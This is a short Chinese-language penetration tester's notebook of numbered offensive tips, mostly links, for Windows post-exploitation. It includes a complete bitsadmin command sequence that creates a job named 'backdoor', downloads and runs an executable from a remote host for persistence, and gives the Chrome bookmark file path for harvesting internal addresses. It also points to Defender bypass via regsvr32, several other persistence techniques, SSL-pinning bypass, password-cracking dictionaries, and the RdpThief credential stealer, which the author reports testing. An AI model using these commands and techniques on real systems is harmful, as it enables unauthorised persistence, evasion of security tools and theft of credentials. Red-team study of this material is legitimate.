0x01 Chrome书签导出,可用于发现内部系统访问地址

文件存储位置C:\Users%username%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks

0x02 利用bitsadmin实现持久化

bitsadmin /create backdoor
bitsadmin /addfile backdoor "http://10.0.2.21/pentestlab.exe"  "C:\tmp\pentestlab.exe"
bitsadmin /SetNotifyCmdLine backdoor C:\tmp\pentestlab.exe NUL
bitsadmin /SetMinRetryDelay "backdoor" 60
bitsadmin /resume backdoor

0x03 利用netsh实现持久化

https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/

0x04 多种不通过powershell.exe执行powershell的方式

https://www.anquanke.com/post/id/189152

0x05 regsvr32执行sct文件绕过defender的多种方式

https://www.trustedsec.com/blog/discovering-the-anti-virus-signature-and-bypassing-it/
https://www.freebuf.com/column/164986.html

0x05 比较特殊的权限维持方式

https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/

0x06 hashcat gui以及各类字典

https://hashkiller.co.uk/

0x07 缓解ntlm relay/smb 签名

https://support.microsoft.com/zh-cn/help/161372/how-to-enable-smb-signing-in-windows-nt

0x08 powerview的.net版本

https://github.com/tevora-threat/SharpView.git

0x09 客户端证书校验绕过抓包

https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/

0x10 基于Win32Time服务的持久化技术

https://xz.aliyun.com/t/6738

0x11 powershell受限条件下执行

https://www.cnblogs.com/-qing-/p/10620717.html
Unmanaged powershell

加快Powershell执行速度

Get-Process -name powershell | foreach { $_.PriorityClass = "High" }

RDP Thief

https://github.com/0x09AL/RdpThief.git今天进行了测试,Win7,效果可以